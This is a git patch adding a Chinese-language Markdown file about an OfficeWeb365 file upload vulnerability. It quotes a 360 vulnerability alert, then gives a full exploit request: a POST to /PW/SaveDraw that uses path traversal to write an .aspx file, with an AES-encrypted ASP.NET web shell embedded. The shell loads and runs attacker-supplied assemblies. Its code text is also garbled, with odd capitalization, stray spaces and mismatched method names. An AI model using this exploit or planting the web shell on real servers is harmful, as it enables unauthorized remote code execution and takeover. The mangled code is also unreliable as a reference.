From 234b65f4377d8054cf2584d780c5518c2f58f989 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 20 Aug 2023 10:00:37 +0800
Subject: [PATCH] =?UTF-8?q?Create=20OfficeWeb365=20=E6=96=87=E4=BB=B6?=
 =?UTF-8?q?=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 OfficeWeb365 文件上传漏洞.md | 80 ++++++++++++++++++++++++++++++++++++
 1 file changed, 80 insertions(+)
 create mode 100644 OfficeWeb365 文件上传漏洞.md

diff --git a/OfficeWeb365 文件上传漏洞.md b/OfficeWeb365 文件上传漏洞.md
new file mode 100644
index 0000000..5c290c8
--- /dev/null
+++ b/OfficeWeb365 文件上传漏洞.md	
@@ -0,0 +1,80 @@
+## OfficeWeb365 文件上传漏洞
+【消息详情】：360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息，经漏洞云复核，确认为【真实】漏洞，漏洞影响【未知】版本，该漏洞标准化POC已经上传漏洞云情报平台，平台编号：360LDYLD-2023-00002453，情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
+360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息，经漏洞云复核，确认为【真实】漏洞，漏洞影响【未知】版本，该漏洞标准化POC已经升级漏洞云情报平台，平台编号： 360LDYLD-2023-0000245
+```
+POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
+Host: 
+Content-Length: 500817
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
+Accept-Encoding: gzip, deflate
+
+data:image/png;base64,01s34567890123456789y12345678901234567m91<% @ Page Language="C #"%>
+
+<% @ Import namespace="System. Reflection"%>
+
+<Script Run="Server">
+
+Private byte decryption (byte data)
+
+{
+
+String key="e45e329feb5d925b";
+
+Data=Convert. FromBase64String (System. Text. Encoding. UTF8. GetString (data));
+
+System. Security. Cryptography. RijndaelManaged aes=new System. Security. Cryptography. RijndaelManaged();
+
+Aes. Mode=System. Security. Cryptography. CipherMode. ECB;
+
+Aes. Key=Encoding. UTF8. GetBytes (key);
+
+Aes. Padding=System. Security. Cryptography. PaddingMode. PKCS7;
+
+Return aes. CreateDecryptor(). TransformFinalBlock (data, 0, data. Length);
+
+}
+
+Private Byte Encryption (Byte Data)
+
+{
+
+String key="e45e329feb5d925b";
+
+System. Security. Cryptography. RijndaelManaged aes=new System. Security. Cryptography. RijndaelManaged();
+
+Aes. Mode=System. Security. Cryptography. CipherMode. ECB;
+
+Aes. Key=Encoding. UTF8. GetBytes (key);
+
+Aes. Padding=System. Security. Cryptography. PaddingMode. PKCS7;
+
+Return System. Text. Encoding. UTF8. GetBytes (Convert. ToBase64String (aes. CreateEncryptor(). TransformFinalBlock (data, 0, data. Length)));
+
+}
+
+</Script>
+
+<%
+
+//Byte [] c=Request. BinaryRead (Request. ContentLength); Assembly. Load (Decrypt (c)). CreateInstance ("U"). Equals (this);
+
+Byte [] c=Request. BinaryRead (Request. ContentLength);
+
+String asname=System. Text. Encoding. ASCII. GetString (new byte [] {0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x52, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x2e, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79});
+
+Type Assembly=Type. GetType (asname);
+
+MethodInfo load=assembly. GetMethod ("Load", new Type [] {new byte [0]. GetType()});
+
+Object obj=load. Invoke (null, new object [] {Decrypt (c)});
+
+MethodInfo create=assembly. GetMethod ("CreateInstance", new Type [] {"". GetType()});
+
+String name=System. Text. Encoding. ASCII. GetString (new byte [] {0x55});
+
+Object pay=create. Invoke (obj, new object [] {name});
+
+Pay. Equals (this);%>>---
+
+```